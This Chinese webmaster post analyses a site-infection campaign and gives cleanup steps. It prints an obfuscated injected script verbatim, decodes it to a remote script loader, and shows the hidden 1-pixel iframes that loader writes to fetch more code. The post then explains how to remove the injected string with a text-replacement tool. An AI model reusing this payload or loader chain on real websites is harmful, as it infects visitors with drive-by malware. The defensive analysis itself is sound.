仲介交易 HTTP://www.aliyun.com/zixun/aggregation/6858.html">SEO診斷淘寶客 站長團購 雲主機 技術大廳
近日有多個網友的網頁被掛馬!
「<script>document.writeln("\x3C\x73\x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\ x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\ x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\ x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>」
最新的木馬
是十六進位的
把\x替換為%,然後用html代碼轉換功能,解碼
<script src=HTTP://O%66%66%49%63e%2E%46%41Q%53%65%72v.%43%6F%4D/% 46%41%51%2E%6A%73></script>
在轉換一次,解碼
最終js 輸出的是
<script src=HTTP://OffIce.FAQServ.CoM/FAQ.js ></script>
faq.js裡面是
document.write('<iframe src="HTTPs://www.59.vc/page/add_54738542.htm" width="1" height="1" frameborder="1"></iframe>');
document.write('<iframe src="HTTPs://OffIce.FAQServ.com/FAQ.htm" width="1" height="2" frameborder="0"> </iframe>');
HTTPs://OffIce.FAQServ.com/FAQ.htm
下載下來發現了這麼一串代碼:<script language="javascript" src="HTTPs://count18.51yes.com/click.aspxid=189404354 &logo=1"></script>
木馬的位址其中一個是51yes的
HTTPs://www.59.vc/page/add_54738542.htm"
下載下來發現了這麼一串代碼<script src=addr.js></script><script language="javascript" type="text/javascript" src= "HTTPs://js.users.51.la/1542776.js"></script>
為了防止大家中毒把HTTP改成了HTTPs
暫時解決辦法:
下載文本替換專家 : HTTP://sccrc.onlinedown.net/down/wfReplace26.rar
將網站中的代
<script>document.writeln("\x3C\x73\ x63\x72\x69\x70\x74\x20\x73\x72\x63\x3D\x68\x74\x74\x70\x3A\x2F\x2F\x4F\x25\x36\x36\x25\x36\x36\x25\x34\x39\ x25\x36\x33\x65\x25\x32\x45\x25\x34\x36\x25\x34\x31\x51\x25\x35\x33\x25\x36\x35\x25\x37\x32\x76\x2E\x25\x34\ x33\x25\x36\x46\x25\x34\x44\x2F\x25\x34\x36\x25\x34\x31\x25\x35\x31\x25\x32\x45\x25\x36\x41\x25\x37\x33\x3E\ x3C\x2F\x73\x63\x72\x69\x70\x74\x3E");</script>
換成 空
選擇網站路徑,替換,然後重新上專即可.